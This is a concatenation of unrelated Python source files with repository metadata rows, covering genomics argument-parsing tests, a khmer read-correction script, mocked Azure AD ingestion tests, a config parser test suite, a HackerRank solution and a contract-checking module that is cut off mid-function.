chromosome = str(uuid.uuid4())
arguments = parse_harness([FLAG_CHROMOSOME, chromosome], add_chromosome_flag)
assert arguments.chromosome == chromosome
assert parse_harness([], add_chromosome_flag).chromosome is OUTPUT_COLUMN_CHROMOSOME
def test_add_position():
"""
Test arguments for position column.
@return: None
"""
position = str(uuid.uuid4())
arguments = parse_harness([FLAG_POSITION, position], add_position_flag)
assert arguments.position == position
assert parse_harness([], add_position_flag).position is OUTPUT_COLUMN_POSITION
def test_add_ref() -> None:
"""
Test arguments for alternative column.
@return: None
"""
reference = str(uuid.uuid4())
arguments = parse_harness([FLAG_REFERENCE, reference], add_reference_flag)
assert arguments.reference == reference
assert parse_harness([], add_reference_flag).reference is OUTPUT_COLUMN_REFERENCE
def test_add_alt() -> None:
"""
Test arguments for alternative column.
@return: None
"""
alternative = str(uuid.uuid4())
arguments = parse_harness([FLAG_ALTERNATIVE, alternative], add_alternate_flag)
assert arguments.alternative == alternative
assert (
parse_harness([], add_alternate_flag).alternative is OUTPUT_COLUMN_ALTERNATIVE
)
def test_add_p_value() -> None:
"""
Test arguments for p-value column.
@return: None
"""
p_value = str(uuid.uuid4())
arguments = parse_harness([FLAG_P_VALUE, p_value], add_p_value_flag)
assert arguments.p_value == p_value
assert parse_harness([], add_p_value_flag).p_value == OUTPUT_COLUMN_P_VALUE
def test_add_m_log_p_value() -> None:
"""
Test arguments for m log p value column.
@return: None
"""
m_log_p_value = str(uuid.uuid4())
arguments = parse_harness(
[FLAG_M_LOG_P_VALUE, m_log_p_value], add_m_log_p_value_flag
)
assert arguments.m_log_p_value == m_log_p_value
arguments = parse_harness([], add_m_log_p_value_flag)
assert arguments.m_log_p_value == OUTPUT_COLUMN_M_LOG_P_VALUE
def test_add_beta() -> None:
"""
Test arguments for beta column.
@return: None
"""
beta = str(uuid.uuid4())
arguments = parse_harness([FLAG_BETA, beta], add_beta_value_flag)
assert arguments.beta == beta
assert parse_harness([], add_beta_value_flag).beta == OUTPUT_COLUMN_BETA
def test_add_se_beta() -> None:
"""
Test arguments for beta column.
@return: None
"""
se_beta = str(uuid.uuid4())
arguments = parse_harness([FLAG_SE_BETA, se_beta], add_se_beta_value_flag)
assert arguments.se_beta == se_beta
assert parse_harness([], add_se_beta_value_flag).se_beta == OUTPUT_COLUMN_SE_BETA
def test_add_exclude() -> None:
"""
Test argument for columns to exclude.
@return: None
"""
exclude = str(uuid.uuid4())
arguments = parse_harness([FLAG_EXCLUDE, exclude], add_exclude_value_flag)
assert arguments.exclude == exclude
assert parse_harness([], add_exclude_value_flag).exclude == DEFAULT_EXCLUDE
def test_add_rename() -> None:
"""
Test arguments for rename.
@return: None
"""
new_name = str(uuid.uuid4())
old_name = str(uuid.uuid4())
rename = f"{old_name}:{new_name}"
arguments = parse_harness([FLAG_RENAME, rename], add_rename_value_flag)
assert arguments.rename == rename
assert parse_harness([], add_rename_value_flag).rename == DEFAULT_RENAME
def test_parse_out_file() -> None:
"""
Test arguments for out file.
@return: None
"""
out_file = str(uuid.uuid4())
arguments = parse_harness(["--out-file", out_file], add_out_file_value_flag)
assert arguments.out_file == out_file
assert parse_harness([], add_out_file_value_flag).out_file == DEFAULT_OUT_FILE
def test_add_in_file() -> None:
"""
Test arguments for input file.
@return: None
"""
in_file = str(uuid.uuid4())
assert parse_harness([in_file], add_in_file_value_flag).in_file == in_file
assert parse_harness([], add_in_file_value_flag).in_file == DEFAULT_IN_FILE
| 26.174089 | 88 | 0.692653 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,454 | 0.224903 |
9085232046fc5765251336d07c6534499f1401bb | 4,388 | py | Python | sandbox/error-correct-pass2.py | sadeepdarshana/khmer | bee54c4f579611d970c59367323d31d3545cafa6 | [
"CNRI-Python"
]
| 558 | 2015-05-22T15:03:21.000Z | 2022-03-23T04:49:17.000Z | sandbox/error-correct-pass2.py | sadeepdarshana/khmer | bee54c4f579611d970c59367323d31d3545cafa6 | [
"CNRI-Python"
]
| 1,057 | 2015-05-14T20:27:04.000Z | 2022-03-08T09:29:36.000Z | sandbox/error-correct-pass2.py | sadeepdarshana/khmer | bee54c4f579611d970c59367323d31d3545cafa6 | [
"CNRI-Python"
]
| 193 | 2015-05-18T10:13:34.000Z | 2021-12-10T11:58:01.000Z | #! /usr/bin/env python
# This file is part of khmer, https://github.com/dib-lab/khmer/, and is
# Copyright (C) 2011-2015, Michigan State University.
# Copyright (C) 2015, The Regents of the University of California.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
#
# * Neither the name of the Michigan State University nor the names
# of its contributors may be used to endorse or promote products
# derived from this software without specific prior written
# permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Contact: [email protected]
"""
Error correct reads based on a counting hash from a diginorm step.
Output sequences will be put in inputfile.corr.
% python scripts/error-correct-pass2 <counting.ct> <readfile>
Use '-h' for parameter help.
"""
import sys
import os
import screed
import khmer
from khmer import Countgraph
from khmer import khmer_args
from khmer.khmer_args import FileType as khFileType
DEFAULT_CUTOFF = 2
def output_single(read, new_sequence):
name = read.name
sequence = new_sequence
quality = None
if hasattr(read, 'quality'):
quality = read.quality[:len(sequence)]
sequence = sequence[:len(quality)] # sequence is _lengthened_
if quality:
assert len(sequence) == len(quality), (sequence, quality)
return "@%s\n%s\n+\n%s\n" % (name, sequence, quality)
else:
return ">%s\n%s\n" % (name, sequence)
def main():
parser = khmer_args.build_counting_args(
"Correct reads against an already-computed table",
citations=['counting', 'SeqAn'])
parser.add_argument("--trusted-cov", dest="trusted_cov", type=int,
default=DEFAULT_CUTOFF)
parser.add_argument("--theta", dest="bits_theta", type=float, default=1.0)
parser.add_argument('-o', '--output', dest='output_file',
help="output file for histogram; defaults to "
"<first filename>.corr in cwd.",
type=khFileType('w'), default=None)
parser.add_argument('counts_table')
parser.add_argument('readfile')
args = parser.parse_args()
print('loading counts')
ht = Countgraph.load(args.counts_table)
aligner = khmer.ReadAligner(ht,
args.trusted_cov,
args.bits_theta)
print("trusted:", args.trusted_cov)
corrfp = args.output_file
if not corrfp:
outfile = os.path.basename(args.readfile) + '.corr'
corrfp = open(outfile, 'w')
n_corrected = 0
for n, read in enumerate(screed.open(args.readfile)):
if n % 10000 == 0:
print('...', n, n_corrected, file=sys.stderr)
seq = read.sequence.replace('N', 'A')
# build the alignment...
score, graph_alignment, read_alignment, truncated = \
aligner.align(seq)
if not truncated:
graph_seq = graph_alignment.replace("-", "")
if graph_seq != seq:
n_corrected += 1
seq = graph_seq
corrfp.write(output_single(read, seq))
if __name__ == '__main__':
main()
| 35.104 | 78 | 0.66773 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,381 | 0.542616 |
908535dac0f891e497250dce7197eb9409ed8be9 | 7,745 | py | Python | metadata-ingestion/tests/integration/azure_ad/test_azure_ad.py | zhoxie-cisco/datahub | 254a73e6ca9b1ec6002fcf013ed42cb6a754d1ad | [
"Apache-2.0"
]
| 1 | 2021-11-16T03:45:33.000Z | 2021-11-16T03:45:33.000Z | metadata-ingestion/tests/integration/azure_ad/test_azure_ad.py | zhoxie-cisco/datahub | 254a73e6ca9b1ec6002fcf013ed42cb6a754d1ad | [
"Apache-2.0"
]
| 4 | 2022-03-02T03:01:24.000Z | 2022-03-23T00:57:33.000Z | metadata-ingestion/tests/integration/azure_ad/test_azure_ad.py | zhoxie-cisco/datahub | 254a73e6ca9b1ec6002fcf013ed42cb6a754d1ad | [
"Apache-2.0"
]
| 5 | 2021-07-26T08:37:42.000Z | 2021-11-16T05:41:02.000Z | import json
import pathlib
from unittest.mock import patch
from freezegun import freeze_time
from datahub.ingestion.run.pipeline import Pipeline
from datahub.ingestion.source.identity.azure_ad import AzureADConfig
from tests.test_helpers import mce_helpers
FROZEN_TIME = "2021-08-24 09:00:00"
def test_azure_ad_config():
config = AzureADConfig.parse_obj(
dict(
client_id="00000000-0000-0000-0000-000000000000",
tenant_id="00000000-0000-0000-0000-000000000000",
client_secret="xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx",
redirect="https://login.microsoftonline.com/common/oauth2/nativeclient",
authority="https://login.microsoftonline.com/00000000-0000-0000-0000-000000000000",
token_url="https://login.microsoftonline.com/00000000-0000-0000-0000-000000000000/oauth2/token",
graph_url="https://graph.microsoft.com/v1.0",
ingest_users=True,
ingest_groups=True,
ingest_group_membership=True,
)
)
    # Sanity-check the required configuration values
assert config.client_id == "00000000-0000-0000-0000-000000000000"
assert config.tenant_id == "00000000-0000-0000-0000-000000000000"
assert config.client_secret == "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"
assert (
config.redirect
== "https://login.microsoftonline.com/common/oauth2/nativeclient"
)
assert (
config.authority
== "https://login.microsoftonline.com/00000000-0000-0000-0000-000000000000"
)
assert (
config.token_url
== "https://login.microsoftonline.com/00000000-0000-0000-0000-000000000000/oauth2/token"
)
assert config.graph_url == "https://graph.microsoft.com/v1.0"
# assert on defaults
assert config.ingest_users
assert config.ingest_groups
assert config.ingest_group_membership
@freeze_time(FROZEN_TIME)
def test_azure_ad_source_default_configs(pytestconfig, tmp_path):
test_resources_dir: pathlib.Path = (
pytestconfig.rootpath / "tests/integration/azure_ad"
)
with patch(
"datahub.ingestion.source.identity.azure_ad.AzureADSource.get_token"
) as mock_token, patch(
"datahub.ingestion.source.identity.azure_ad.AzureADSource._get_azure_ad_users"
) as mock_users, patch(
"datahub.ingestion.source.identity.azure_ad.AzureADSource._get_azure_ad_groups"
) as mock_groups, patch(
"datahub.ingestion.source.identity.azure_ad.AzureADSource._get_azure_ad_group_users"
) as mock_group_users:
mocked_functions(
test_resources_dir, mock_token, mock_users, mock_groups, mock_group_users
)
        # Run an Azure AD ingestion pipeline.
pipeline = Pipeline.create(
{
"run_id": "test-azure-ad",
"source": {
"type": "azure-ad",
"config": {
"client_id": "00000000-0000-0000-0000-000000000000",
"tenant_id": "00000000-0000-0000-0000-000000000000",
"client_secret": "client_secret",
"redirect": "https://login.microsoftonline.com/common/oauth2/nativeclient",
"authority": "https://login.microsoftonline.com/00000000-0000-0000-0000-000000000000",
"token_url": "https://login.microsoftonline.com/00000000-0000-0000-0000-000000000000/oauth2/token",
"graph_url": "https://graph.microsoft.com/v1.0",
"ingest_group_membership": True,
"ingest_groups": True,
"ingest_users": True,
},
},
"sink": {
"type": "file",
"config": {
"filename": f"{tmp_path}/azure_ad_mces_default_config.json",
},
},
}
)
pipeline.run()
pipeline.raise_from_status()
mce_helpers.check_golden_file(
pytestconfig,
output_path=tmp_path / "azure_ad_mces_default_config.json",
golden_path=test_resources_dir / "azure_ad_mces_golden_default_config.json",
)
@freeze_time(FROZEN_TIME)
def test_azure_source_ingestion_disabled(pytestconfig, tmp_path):
test_resources_dir: pathlib.Path = (
pytestconfig.rootpath / "tests/integration/azure_ad"
)
with patch(
"datahub.ingestion.source.identity.azure_ad.AzureADSource.get_token"
) as mock_token, patch(
"datahub.ingestion.source.identity.azure_ad.AzureADSource._get_azure_ad_users"
) as mock_users, patch(
"datahub.ingestion.source.identity.azure_ad.AzureADSource._get_azure_ad_groups"
) as mock_groups, patch(
"datahub.ingestion.source.identity.azure_ad.AzureADSource._get_azure_ad_group_users"
) as mock_group_users:
mocked_functions(
test_resources_dir, mock_token, mock_users, mock_groups, mock_group_users
)
        # Run an Azure AD ingestion pipeline.
pipeline = Pipeline.create(
{
"run_id": "test-azure-ad",
"source": {
"type": "azure-ad",
"config": {
"client_id": "00000000-0000-0000-0000-000000000000",
"tenant_id": "00000000-0000-0000-0000-000000000000",
"client_secret": "client_secret",
"redirect": "https://login.microsoftonline.com/common/oauth2/nativeclient",
"authority": "https://login.microsoftonline.com/00000000-0000-0000-0000-000000000000",
"token_url": "https://login.microsoftonline.com/00000000-0000-0000-0000-000000000000/oauth2/token",
"graph_url": "https://graph.microsoft.com/v1.0",
"ingest_group_membership": "False",
"ingest_groups": "False",
"ingest_users": "False",
},
},
"sink": {
"type": "file",
"config": {
"filename": f"{tmp_path}/azure_ad_mces_ingestion_disabled.json",
},
},
}
)
pipeline.run()
pipeline.raise_from_status()
mce_helpers.check_golden_file(
pytestconfig,
output_path=tmp_path / "azure_ad_mces_ingestion_disabled.json",
golden_path=test_resources_dir / "azure_ad_mces_golden_ingestion_disabled.json",
)
def load_test_resources(test_resources_dir):
azure_ad_users_json_file = test_resources_dir / "azure_ad_users.json"
azure_ad_groups_json_file = test_resources_dir / "azure_ad_groups.json"
with azure_ad_users_json_file.open() as azure_ad_users_json:
reference_users = json.loads(azure_ad_users_json.read())
with azure_ad_groups_json_file.open() as azure_ad_groups_json:
reference_groups = json.loads(azure_ad_groups_json.read())
return reference_users, reference_groups
def mocked_functions(
test_resources_dir, mock_token, mock_users, mock_groups, mock_groups_users
):
# mock token response
mock_token.return_value = "xxxxxxxx"
# mock users and groups response
users, groups = load_test_resources(test_resources_dir)
mock_users.return_value = iter(list([users]))
mock_groups.return_value = iter(list([groups]))
# For simplicity, each user is placed in ALL groups.
# Create a separate response mock for each group in our sample data.
r = []
for _ in groups:
r.append(users)
mock_groups_users.return_value = iter(r)
| 39.314721 | 123 | 0.629438 | 0 | 0 | 0 | 0 | 4,756 | 0.614074 | 0 | 0 | 3,193 | 0.412266 |
9085eea801b451acd44298bd5d756b5655efe26d | 138 | py | Python | edit/core/optimizer/__init__.py | tpoisonooo/basicVSR_mge | 53df836a7dcc075083ef7c9ff7cabea69fec3192 | [
"Apache-2.0"
]
| 28 | 2021-03-23T09:00:33.000Z | 2022-03-10T03:55:00.000Z | edit/core/optimizer/__init__.py | tpoisonooo/basicVSR_mge | 53df836a7dcc075083ef7c9ff7cabea69fec3192 | [
"Apache-2.0"
]
| 2 | 2021-04-17T20:08:55.000Z | 2022-02-01T17:48:55.000Z | edit/core/optimizer/__init__.py | tpoisonooo/basicVSR_mge | 53df836a7dcc075083ef7c9ff7cabea69fec3192 | [
"Apache-2.0"
]
| 5 | 2021-05-19T07:35:56.000Z | 2022-01-13T02:11:50.000Z | from .builder import build_optimizers, MGE_OPTIMIZERS, build_gradmanagers
from .default_constructor import DefaultOptimizerConstructor
| 23 | 73 | 0.876812 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
90861fa0047d98bc9b632e22782ae0a512bc70e6 | 561 | py | Python | hackerrank/medium/Climbing_the_Leaderboard.py | HoussemBousmaha/Competitive-Programming | c4530fc01d8933bdfefec7fb6d31cd648e760334 | [
"MIT"
]
| 6 | 2022-03-02T23:08:00.000Z | 2022-03-07T07:26:48.000Z | hackerrank/medium/Climbing_the_Leaderboard.py | HoussemBousmaha/Competitive-Programming | c4530fc01d8933bdfefec7fb6d31cd648e760334 | [
"MIT"
]
| null | null | null | hackerrank/medium/Climbing_the_Leaderboard.py | HoussemBousmaha/Competitive-Programming | c4530fc01d8933bdfefec7fb6d31cd648e760334 | [
"MIT"
]
| null | null | null | def climbingLeaderboard(ranked, player):
    # Dense ranking: deduplicate the leaderboard scores and sort them descending.
    ranked = sorted(list(set(ranked)), reverse=True)
ranks = []
# print(ranked)
for i in range(len(player)):
bi = 0
bs = len(ranked) - 1
index = 0
        # Binary search for the last index whose score is strictly greater
        # than the player's current score.
        while (bi <= bs):
mid = (bi+bs) // 2
if (ranked[mid] > player[i]):
index = mid
bi = mid + 1
else:
bs = mid - 1
if (ranked[index] > player[i]):
index += 1
index += 1
ranks.append(index)
return ranks
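# Example (the well-known HackerRank sample, checked against the function above):
# climbingLeaderboard([100, 100, 50, 40, 40, 20, 10], [5, 25, 50, 120])
# returns [6, 4, 2, 1] -- one dense rank per player score.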
| 20.035714 | 52 | 0.43672 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 15 | 0.026738 |
908733eb70f6006bbe7cab4fd64970e3aec01842 | 8,352 | py | Python | src/python/config/parser/test_parsing.py | ncsa/NCSA-Genomics_MGC_GenomeGPS_CromwelWDL | 4611896ea1bb50df50120752712e8d4b32a6d023 | [
"MIT"
]
| null | null | null | src/python/config/parser/test_parsing.py | ncsa/NCSA-Genomics_MGC_GenomeGPS_CromwelWDL | 4611896ea1bb50df50120752712e8d4b32a6d023 | [
"MIT"
]
| null | null | null | src/python/config/parser/test_parsing.py | ncsa/NCSA-Genomics_MGC_GenomeGPS_CromwelWDL | 4611896ea1bb50df50120752712e8d4b32a6d023 | [
"MIT"
]
| null | null | null | #!/usr/bin/env python3
import unittest
from config.parser.parsing import Parser
class TestParser(unittest.TestCase):
# Create an instance of the Parser class
parser_inst = Parser(job_id="NA")
# Turn the project logger off during UnitTesting, so the end user is not confused by error messages
# (Some tests are designed to fail, so they will log "ERROR" messages that are expected)
parser_inst.project_logger.logger.disabled = True
def test_remove_comments(self):
# Should remove comment lines
input_lines = ["# Comment line", " # Whitespace with comment", 'Key="Value"']
filtered_lines = Parser.remove_comments(input_lines)
self.assertEqual(filtered_lines, ['Key="Value"'])
def test_clean_input_file(self):
# Should remove blank and comment lines
input_lines = ["", "", "# Comment line", 'Key="Value"']
filtered_lines = Parser.clean_input_file(input_lines)
self.assertEqual(filtered_lines, ['Key="Value"'])
def test_create_key_value_pairs(self):
# Note: the second test case purposefully has an '=' in the value (the parser only assumes the key has no '=')
input_lines = ['Key1="Value1"', 'Key2="Value=2"']
expected_output = [('Key1', '"Value1"'), ('Key2', '"Value=2"')]
self.assertEqual(expected_output,
self.parser_inst.create_key_value_pairs(input_lines, "test_create_key_value_pairs")
)
def test_validate_key_value_pairs_pass(self):
'''
This test has no assert. The method being tested returns nothing, but throws errors if anything fails
This test should pass if the validate function can be called without throwing an error
'''
valid_tuple = [("keyA", '"valueA"')]
self.parser_inst.validate_key_value_pairs(valid_tuple, file_path="dummy_file_path")
def test_validate_key_value_pairs_fail_empty_value(self):
no_value_tuple = [("keyA", "")]
with self.assertRaises(SystemExit):
self.parser_inst.validate_key_value_pairs(no_value_tuple, file_path="dummy_file_path")
def test_validate_key_value_pairs_pass_empty_optional_key(self):
# InputRead2 is a key that is allowed to be empty (see src/config/util/special_keys.py)
nullable_key_empty_value = [("DebugMode", "")]
self.parser_inst.validate_key_value_pairs(nullable_key_empty_value, file_path="dummy_file_path")
def test_validate_key_value_pairs_fail_empty_non_optional_key(self):
# InputRead1 is a key that is not allowed to be empty (it must have a value)
key_empty_value = [("InputRead1", "")]
with self.assertRaises(SystemExit):
self.parser_inst.validate_key_value_pairs(key_empty_value, file_path="dummy_file_path")
def test_validate_key_value_pairs_fail_no_quotes(self):
no_value_tuple = [("keyA", 'Value without quotes')]
with self.assertRaises(SystemExit):
self.parser_inst.validate_key_value_pairs(no_value_tuple, file_path="dummy_file_path")
def test_validate_key_value_pairs_fail_special_characters(self):
no_value_tuple = [("keyA", '!@#$%&&^%(*&^%s')]
with self.assertRaises(SystemExit):
self.parser_inst.validate_key_value_pairs(no_value_tuple, file_path="dummy_file_path")
def test_validate_key_value_pairs_fail_duplicate_keys(self):
no_value_tuple = [("duplicateKey", 'valueA'), ("duplicateKey", "valueB")]
with self.assertRaises(SystemExit):
self.parser_inst.validate_key_value_pairs(no_value_tuple, file_path="dummy_file_path")
def test_insert_values_into_dict(self):
original_dict = {'major.minor.A': "init_A_value",
'major.minor.B': "init_B_value",
'major.minor.C': "init_C_value"
}
key_value_tuples = [('A', '"final_A_value"'), ("B", '"final_B_value"')]
substituted_dict = self.parser_inst.insert_values_into_dict(original_dict,
key_value_tuples,
"test_insert_values_into_dict"
)
# The final dictionary should have new values for A and B, which C's value unchanged
expected_dict = {'major.minor.A': "final_A_value",
'major.minor.B': "final_B_value",
'major.minor.C': "init_C_value"
}
self.assertEqual(expected_dict, substituted_dict)
def test_combine_input_read_arrays_paired_end_both(self):
key_value_tuples = [("PairedEnd", '"true"'),
("NormalInputRead1", '"readL1.fq,readL2.fq,readL3.fq"'),
("NormalInputRead2", '"readR1.fq,readR2.fq,readR3.fq"')
]
expected_paired_end_value = [["readL1.fq", "readR1.fq"], ["readL2.fq", "readR2.fq"], ["readL3.fq", "readR3.fq"]]
actual_paired_end_value = self.parser_inst.combine_input_read_arrays(key_value_tuples,
"NormalInputRead1",
"NormalInputRead2"
)
self.assertEqual(expected_paired_end_value, actual_paired_end_value)
def test_combine_input_read_arrays_paired_end_one(self):
key_value_tuples = [("PairedEnd", '"true"'),
("NormalInputRead1", '"readL1.fq,readL2.fq,readL3.fq"'),
("NormalInputRead2", '""')
]
with self.assertRaises(SystemExit):
# Should fail, as paired end is true but only one read set is provided
self.parser_inst.combine_input_read_arrays(key_value_tuples, "NormalInputRead1", "NormalInputRead2")
def test_combine_input_read_arrays_paired_end_unequal_lists(self):
key_value_tuples = [("PairedEnd", '"true"'),
("NormalInputRead1", '"readL1.fq,readL2.fq,readL3.fq"'),
("NormalInputRead2", '"readR1.fq"')
]
with self.assertRaises(SystemExit):
# Should fail, as paired end is true but only one read set is provided
self.parser_inst.combine_input_read_arrays(key_value_tuples, "NormalInputRead1", "NormalInputRead2")
def test_combine_input_read_arrays_single_end_both(self):
key_value_tuples = [("PairedEnd", '"false"'),
("NormalInputRead1", '"readL1.fq,readL2.fq,readL3.fq"'),
("NormalInputRead2", '"readR1.fq,readR2.fq,readR3.fq"')
]
expected_paired_end_value = [["readL1.fq"], ["readL2.fq"], ["readL3.fq"],
["readR1.fq"], ["readR2.fq"], ["readR3.fq"]]
actual_paired_end_value = self.parser_inst.combine_input_read_arrays(key_value_tuples,
"NormalInputRead1",
"NormalInputRead2"
)
self.assertEqual(expected_paired_end_value, actual_paired_end_value)
def test_combine_input_read_arrays_single_end_one(self):
key_value_tuples = [("PairedEnd", '"false"'),
("NormalInputRead1", '"readL1.fq,readL2.fq,readL3.fq"'),
("NormalInputRead2", '""')
]
expected_paired_end_value = [["readL1.fq"], ["readL2.fq"], ["readL3.fq"]]
actual_paired_end_value = self.parser_inst.combine_input_read_arrays(key_value_tuples,
"NormalInputRead1",
"NormalInputRead2"
)
self.assertEqual(expected_paired_end_value, actual_paired_end_value)
| 53.538462 | 120 | 0.578544 | 8,265 | 0.989583 | 0 | 0 | 0 | 0 | 0 | 0 | 2,640 | 0.316092 |
9088061118cf617385915ed728847f4d1b206103 | 862 | py | Python | scripts/aggregate_membership.py | LibrariesHacked/wuthering-hacks | c8e87dda86b05aaf9c23a5606472dc72c0aff603 | [
"CC0-1.0",
"MIT"
]
| 5 | 2016-10-02T13:49:29.000Z | 2020-02-12T00:09:14.000Z | scripts/aggregate_membership.py | LibrariesHacked/wuthering-hacks | c8e87dda86b05aaf9c23a5606472dc72c0aff603 | [
"CC0-1.0",
"MIT"
]
| null | null | null | scripts/aggregate_membership.py | LibrariesHacked/wuthering-hacks | c8e87dda86b05aaf9c23a5606472dc72c0aff603 | [
"CC0-1.0",
"MIT"
]
| null | null | null | ## Requires Python v3 and pandas (pip install pandas)
## This script takes the newcastle membership csv and attempts
## to reduce the file size as much as possible through aggregation and lookups
## Two lookup files to provide library names and dates are also created.
import csv
import os
import re
from datetime import datetime
import pandas
MEMBERDATA = '..\\data\\dashboard_newcastle_members.csv'
def read_member_data():
member_data_frame = pandas.DataFrame(
pandas.read_csv(open(os.path.join(os.path.dirname(__file__), MEMBERDATA), 'r')), index=None)
return member_data_frame
def run():
members = read_member_data()
postcodes = members['Postcode'].unique()
libraries = members['Library Registered At'].unique()
dates_added = members['Date Added'].unique()
times_added = members['Date Added'].unique()
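# A minimal sketch (not part of the original script) of how the lookup files
# described in the header comments could be written; the file names and column
# labels below are assumptions, not taken from the original project.
def write_lookups(libraries, dates_added):
    # One row per unique library / date, keyed by an integer id.
    pandas.Series(libraries).to_csv('libraries_lookup.csv',
                                    index_label='id', header=['library'])
    pandas.Series(dates_added).to_csv('dates_lookup.csv',
                                      index_label='id', header=['date'])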
run() | 30.785714 | 100 | 0.732019 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 368 | 0.426914 |
9088b5572da41984c1697dbaf7d670a85f1c124c | 10,535 | py | Python | mdl/contracts/contract.py | fafhrd91/mdl | daada030649305df02f65b77ebdf41cf976a870e | [
"Apache-2.0"
]
| 3 | 2016-12-28T09:31:27.000Z | 2017-01-09T18:38:46.000Z | mdl/contracts/contract.py | fafhrd91/mdl | daada030649305df02f65b77ebdf41cf976a870e | [
"Apache-2.0"
]
| 1 | 2019-05-04T18:14:24.000Z | 2019-05-04T18:14:24.000Z | mdl/contracts/contract.py | fafhrd91/mdl | daada030649305df02f65b77ebdf41cf976a870e | [
"Apache-2.0"
]
| null | null | null | """Interface contract object"""
from __future__ import absolute_import
import six
import sys
import logging
from contracts.interface import ContractException, ContractNotRespected
from .extension import ID
from ..declarations import implementer
from ..verify import verifyObject
from ..interface import InterfaceClass
__all__ = (
'InterfaceContract', 'MethodContract',
'AttributeContract', 'ContractNotRespected')
class InterfaceContract(object):
def __init__(self, iface, contracts, adapter=None):
self.iface = iface
self.elements = {}
self.adapter = adapter
for elem in contracts:
self.elements[elem.name] = elem
self._cls = construct_class(iface, self.elements)
def verify(self, ob):
"""Raise exception if ob does not implement interface"""
verifyObject(self.iface, ob)
def bind(self, ob, verify=True, logger=None):
if verify:
self.verify(ob)
if logger is None:
logger = logging
return self._cls(ob, logger)
def bind_adapter(self, factory, logger=None):
if logger is None:
logger = logging
if self.adapter is not None:
return BoundAdapterContract(factory, self.adapter, logger)
return factory
class AdapterContract(object):
def __init__(self, iface, args, exceptions):
self.name = iface.__name__
self.iface = iface
self.args = args
self.exceptions = exceptions
def _check_args_contract(self, adapter, ob, args, kwargs):
bound = self.getcallargs(*args, **kwargs)
for arg, contract in self.args_contract.items():
context = {'self': ob}
try:
contract._check_contract(context, bound[arg], silent=True)
except ContractNotRespected as e:
msg = 'Breach for argument %r to %s:%s(...)\n' % (
arg, self.iface.__name__, self.name)
e.error = msg + e.error
raise e
def __call__(self, factory, logger, *args, **kwargs):
# self._check_args_contract(ob, args, kwargs)
try:
result = factory(*args, **kwargs)
except:
exc_type, exc_value, exc_tb = sys.exc_info()
# check exception contract
context = {'factory': factory}
for contract in self.exceptions:
try:
contract._check_contract(context, exc_value, silent=True)
except ContractNotRespected:
continue
else:
break
else:
# log un-defined exception
logger.error(
'Un-defined exception received from %s.%s(...)' % (
self.iface.__name__, self.name),
exc_info=(exc_type, exc_value, exc_tb))
six.reraise(exc_type, exc_value, exc_tb)
if not self.iface.providedBy(result):
raise ContractException(
'interface %s is not provided by adapted object %s' % (
self.name, result))
return result
class BoundAdapterContract(object):
def __init__(self, factory, contract, logger):
self.factory = factory
self.contract = contract
self.logger = logger
def __call__(self, *args, **kwargs):
return self.contract(self.factory, self.logger, *args, **kwargs)
class AttributeContract(object):
def __init__(self, iface, attr, contract):
self.name = attr.__name__
self.iface = iface
self.attr = attr
self.contract = contract
def check_value(self, ob, value):
context = {'self': ob}
try:
self.contract._check_contract(context, value, silent=True)
except ContractNotRespected as e:
msg = 'Breach for attribute value of %s.%s\n' % (
self.iface.__name__, self.name)
e.error = msg + e.error
raise e
type_ob = context.get(ID)
if (type_ob is not None and
not isinstance(value, BoundInterfaceContract) and
isinstance(type_ob, InterfaceClass)):
return type_ob.contract(value)
return value
class MethodContract(object):
def __init__(self, iface, method,
args_contract, result_contract, exceptions):
self.name = method.__name__
self.iface = iface
self.method = method
self.args_contract = args_contract
self.result_contract = result_contract
self.exceptions = exceptions
def _check_args_contract(self, ob, args, kwargs):
bound = self.getcallargs(*args, **kwargs)
for arg, contract in self.args_contract.items():
context = {'self': ob}
try:
contract._check_contract(context, bound[arg], silent=True)
except ContractNotRespected as e:
msg = 'Breach for argument %r to %s:%s(...)\n' % (
arg, self.iface.__name__, self.name)
e.error = msg + e.error
raise e
def _check_result_contract(self, ob, result):
context = {'self': ob}
try:
self.result_contract._check_contract(context, result, silent=False)
except ContractNotRespected as e:
msg = 'Breach for return value of %s.%s(...)\n' % (
self.iface.__name__, self.name)
e.error = msg + e.error
raise e
type_ob = context.get(ID)
if (type_ob is not None and
not isinstance(result, BoundInterfaceContract) and
isinstance(type_ob, InterfaceClass)):
return type_ob.contract(result)
return result
def __call__(self, ob, logger, *args, **kwargs):
self._check_args_contract(ob, args, kwargs)
try:
result = getattr(ob, self.name)(*args, **kwargs)
except:
exc_type, exc_value, exc_tb = sys.exc_info()
# check exception contract
context = {'self': ob}
for contract in self.exceptions:
try:
contract._check_contract(context, exc_value, silent=True)
except ContractNotRespected:
continue
else:
break
else:
# log un-defined exception
logger.exception(
'Un-defined exception received from %s.%s(...)' % (
